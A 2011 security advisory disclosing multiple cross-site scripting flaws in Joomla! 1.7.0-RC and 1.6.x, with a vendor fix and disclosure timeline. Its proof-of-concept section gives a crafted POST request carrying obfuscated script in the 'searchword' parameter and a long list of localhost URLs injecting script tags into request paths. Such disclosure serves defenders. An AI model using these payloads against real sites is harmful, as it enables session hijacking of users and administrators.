Joomla! 1.7.0-RC and lower | Multiple Cross Site Scripting (XSS)
Vulnerabilities
- OVERVIEW
Joomla! 1.7.0-RC and versions of 1.6.x are vulnerable to multiple
Cross Site Scripting issues.
- BACKGROUND
Joomla is a free and open source content management system (CMS) for
publishing content on the World Wide Web and intranets. It comprises a
modelβviewβcontroller (MVC) Web application framework that can also be
used independently.
Joomla is written in PHP, uses object-oriented programming (OOP)
techniques and software design patterns, stores data in a MySQL
database, and includes features such as page caching, RSS feeds,
printable versions of pages, news flashes, blogs, polls, search, and
support for language internationalization.
- VULNERABILITY DESCRIPTION
Several parameters (searchword, Request URI) in Joomla! Core
components are not properly sanitized upon submission to the
/index.php url, which allows attacker to conduct Cross Site Scripting
attack. This may allow an attacker to create a specially crafted URL
that would execute arbitrary script code in a victim's browser.
- VERSION AFFECTED
1.7.0-RC and all versions of 1.6.x
- PROOF-OF-CONCEPT/EXPLOIT
component: com_search, parameter: searchword (Browser: IE, Konqueror)
N.B. Our previous reported issue (1.6.3) of "searchword" parameter XSS
was not fixed completely.
[REQUEST]
POST /joomla164_noseo/index.php HTTP/1.1
Host: localhost
Accept: /
Accept-Language: en
User-Agent: MSIE 8.0
Connection: close
Referer: http://localhost/joomla164_noseo/
Content-Type: application/x-www-form-urlencoded
Content-Length: 456
task=search&Itemid=435&searchword=Search';onunload=function(){x=confirm(String.fromCharCode(89,111,117,39,118,101,32,103,111,116,32,97,32,109,101,115,115,97,103,101,32,102,114,111,109,32,65,100,109,105,110,105,115,116,114,97,116,111,114,33,10,68,111,32,121,111,117,32,119,97,110,116,32,116,111,32,103,111,32,116,111,32,73,110,98,111,120,63));alert(String.fromCharCode(89,111,117,39,118,101,32,103,111,116,32,88,83,83,33));};//xsssssssssss&option=com_search
[/REQUEST]
XSS in Request URI
File: ./includes/application.php
Line: 176, 181
Code: $document->setBase(JURI::current()); // instead of
$document->setBase(htmlspecialchars(JURI::current()));
http://localhost/joomla164/index.php/using-joomla/extensions/components/news-feeds-component/new-feed-categories/'"><script>alert(/XSS/)</script>
http://localhost/joomla164/index.php/using-joomla/extensions/components/content-component/article-category-list/24-joomla'"><script>alert(/XSS/)</script>
http://localhost/joomla164/index.php/using-joomla/extensions/components/search-component/search/'"><script>alert(/XSS/)</script>
http://localhost/joomla164/index.php/using-joomla/extensions/components/contact-component/contact-categories/'"><script>alert(/XSS/)</script>
http://localhost/joomla164/index.php/site-map/contacts/'"><script>alert(/XSS/)</script>
http://localhost/joomla164/index.php/component/banners/click/3'"><script>alert(/XSS/)</script>
http://localhost/joomla164/index.php/fruit-encyclopedia/'"><script>alert(/XSS/)</script>
http://localhost/joomla164/index.php/fruit-encyclopedia/38-a'"><script>alert(/XSS/)</script>
http://localhost/joomla164/index.php/fruit-encyclopedia/39-b'"><script>alert(/XSS/)</script>
http://localhost/joomla164/index.php/fruit-encyclopedia/57-t'"><script>alert(/XSS/)</script>
http://localhost/joomla164/index.php/growers/23-happy-orange-orchard'"><script>alert(/XSS/)</script>
http://localhost/joomla164/index.php/image-gallery/animals/25-koala'"><script>alert(/XSS/)</script>
http://localhost/joomla164/index.php/image-gallery/scenery/64-blue-mountain-rain-forest'"><script>alert(/XSS/)</script>
http://localhost/joomla164/index.php/image-gallery/scenery/65-ormiston-pound'"><script>alert(/XSS/)</script>
http://localhost/joomla164/index.php/using-joomla/extensions/components/contact-component/contact-categories/34-park-site/'"><script>alert(/XSS/)</script>
http://localhost/joomla164/index.php/using-joomla/extensions/components/contact-component/contact-categories/34-park-site/2-webmaster'"><script>alert(/XSS/)</script>
http://localhost/joomla164/index.php/using-joomla/extensions/components/contact-component/contact-categories/35-shop-site/'"><script>alert(/XSS/)</script>
http://localhost/joomla164/index.php/using-joomla/extensions/components/contact-component/contact-categories/35-shop-site/8-shop-address'"><script>alert(/XSS/)</script>
http://localhost/joomla164/index.php/using-joomla/extensions/components/content-component/archived-articles/9-uncategorised'"><script>alert(/XSS/)</script>
http://localhost/joomla164/index.php/using-joomla/extensions/components/content-component/archived-articles/9-uncategorised/'"><script>alert(/XSS/)</script>
http://localhost/joomla164/index.php/using-joomla/extensions/components/content-component/archived-articles/9-uncategorised/67-whats-new-in-15'"><script>alert(/XSS/)</script>
http://localhost/joomla164/index.php/using-joomla/extensions/components/content-component/article-categories/26-park-site'"><script>alert(/XSS/)</script>
http://localhost/joomla164/index.php/using-joomla/extensions/components/content-component/article-categories/29-fruit-shop-site'"><script>alert(/XSS/)</script>
http://localhost/joomla164/index.php/using-joomla/extensions/components/content-component/article-category-list/20-extensions'"><script>alert(/XSS/)</script>
http://localhost/joomla164/index.php/using-joomla/extensions/components/content-component/article-category-list/24-joomla'"><script>alert(/XSS/)</script>
http://localhost/joomla164/index.php/using-joomla/extensions/components/news-feeds-component/news-feed-category/'"><script>alert(/XSS/)</script>
http://localhost/joomla164/index.php/using-joomla/extensions/components/news-feeds-component/news-feed-category/1-joomla-announcements'"><script>alert(/XSS/)</script>
http://localhost/joomla164/index.php/using-joomla/extensions/components/news-feeds-component/news-feed-category/2-new-joomla-extensions'"><script>alert(/XSS/)</script>
http://localhost/joomla164/index.php/using-joomla/extensions/components/news-feeds-component/news-feed-category/3-joomla-security-news'"><script>alert(/XSS/)</script>
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
- IMPACT
Attackers can compromise currently logged-in user/administrator
session and impersonate arbitrary user actions available under
/administrator/ functions.
- SOLUTION
The development of Joomla! 1.6.x has been ceased; there will be no
fixed version for 1.6.x.
Upgrade to Joomla! 1.7.0-stable or higher.
- VENDOR
Joomla! Developer Team
http://www.joomla.org
- CREDIT
This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.
- DISCLOSURE TIME-LINE
2011-07-02: notified vendor
2011-07-19: patched version, 1.7.0-stable, released
2011-07-22: vulnerability disclosed
- REFERENCES
Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.7.0-rc]_cross_site_scripting(XSS)
Previous Advisory URL:
http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.6.3]_cross_site_scripting(XSS)
http://yehg.net/lab/#advisories.joomla
Vendor Advisory URL:
http://developer.joomla.org/security/news/357-20110701-xss-vulnerability.html
#yehg [2011-07-22]